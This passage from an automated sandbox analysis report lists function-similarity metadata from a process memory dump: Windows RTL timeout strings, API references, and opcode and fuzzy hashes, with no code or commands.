                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036D02BD
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036D02E7
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                • API String ID: 0-2474120054
                • Opcode ID: 8e5dc8281a66759ade1971741e2e29f5f7ce296b01c6213ecad949f47772183f
                • Instruction ID: 7e151d4629826baa980ef44334fda46804ef41da1981323b83414ac5faa3b0d8
                • Opcode Fuzzy Hash: 8e5dc8281a66759ade1971741e2e29f5f7ce296b01c6213ecad949f47772183f
                • Instruction Fuzzy Hash: FCE1BB70A087419FD725DF28D984B2ABBE0BB88324F180B6DF5A58B3E1D774D845CB52
                Strings
                • RTL: Resource at %p, xrefs: 036D7B8E
                • RTL: Re-Waiting, xrefs: 036D7BAC
                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036D7B7F
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 0-871070163
                • Opcode ID: 827310eceeffccf7a3ae9e5ec109b2f528037e7fcd86d01bad26062b5b63e277
                • Instruction ID: f668fea4dc961372fe7832a3d7e3c321d93328eb7aa9b312a03836c47fc6851f
                • Opcode Fuzzy Hash: 827310eceeffccf7a3ae9e5ec109b2f528037e7fcd86d01bad26062b5b63e277
                • Instruction Fuzzy Hash: 444124357017029FEB24DE28D940B6BB7E9EF88710F040A1EF85ADB780DB71E8058B95
                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036D728C
                Strings
                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036D7294
                • RTL: Resource at %p, xrefs: 036D72A3
                • RTL: Re-Waiting, xrefs: 036D72C1
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 885266447-605551621
                • Opcode ID: a249e5823c2a2b2a875af9609f7fca04fd25ee277a63c730d3d985a890df6df1
                • Instruction ID: c90ff5dea4af749e7804a2a216cc1a0da53ccc137b9f709c9771cbf532795e85
                • Opcode Fuzzy Hash: a249e5823c2a2b2a875af9609f7fca04fd25ee277a63c730d3d985a890df6df1
                • Instruction Fuzzy Hash: DF410335B00346AFDB20DE24DD41B6AB7A9FF84B10F14061AF955EF340DB21E8469BE9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$]:%u
                • API String ID: 48624451-3050659472
                • Opcode ID: 46dce003950a8fbd77092cf1d11aa1feba3785555d0f5f072e5307beac0c6757
                • Instruction ID: cc1dbe9d2cbfbbbdd27015d0219e184f485fd4e97609758d96d2ff0b6fe0776a
                • Opcode Fuzzy Hash: 46dce003950a8fbd77092cf1d11aa1feba3785555d0f5f072e5307beac0c6757
                • Instruction Fuzzy Hash: 0D316677A00619AFCB24DF2DCC40BEEB7B8EB48650F544559E849E7241EB30EA558FA0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction ID: b3913806044b8a81116fa04a211e67c2c179adad00e6019132985e002fca0cd6
                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction Fuzzy Hash: 21918270E00A1A9ADF24DFADC9816BEB7A5BF44720F18455AE865E73C0D7309E418F64
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID:
                • String ID: $$@
                • API String ID: 0-1194432280
                • Opcode ID: c53de87e9b17cdeb85b1d7a5ed1c2359eb4b6ec98e9b921fb2c061a06bccf809
                • Instruction ID: c9770dda3fb35970ac291de18f3e520bde3ebf90f0ee63ff87aa8d3756436ccb
                • Opcode Fuzzy Hash: c53de87e9b17cdeb85b1d7a5ed1c2359eb4b6ec98e9b921fb2c061a06bccf809
                • Instruction Fuzzy Hash: 82815A75D002699BDB21DF54CD44BEEBBB8AF08750F0445EAE909B7280E7709E85CFA4
                APIs
                • @_EH4_CallFilterFunc@8.LIBCMT ref: 036ECFBD
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, Offset: 03630000, based on PE: true
                • Associated: 00000011.00000002.3378895822.0000000003759000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.000000000375D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_17_2_3630000_setupugc.jbxd
                Similarity
                • API ID: CallFilterFunc@8
                • String ID: @$@4Cw@4Cw
                • API String ID: 4062629308-3101775584
                • Opcode ID: 96127acd0ad0f60a5be77cd1165e9dc77e74261537597194006fb61bc33290a2
                • Instruction ID: 4345a5e38f334dee6189df6b22c83f3b3674b5b328228b3aee3ceee03a448657
                • Opcode Fuzzy Hash: 96127acd0ad0f60a5be77cd1165e9dc77e74261537597194006fb61bc33290a2
                • Instruction Fuzzy Hash: AD4188B99012189FDB21DFA8C940AAEBBB8FF45B00F08442EE915DB264D774C845CB65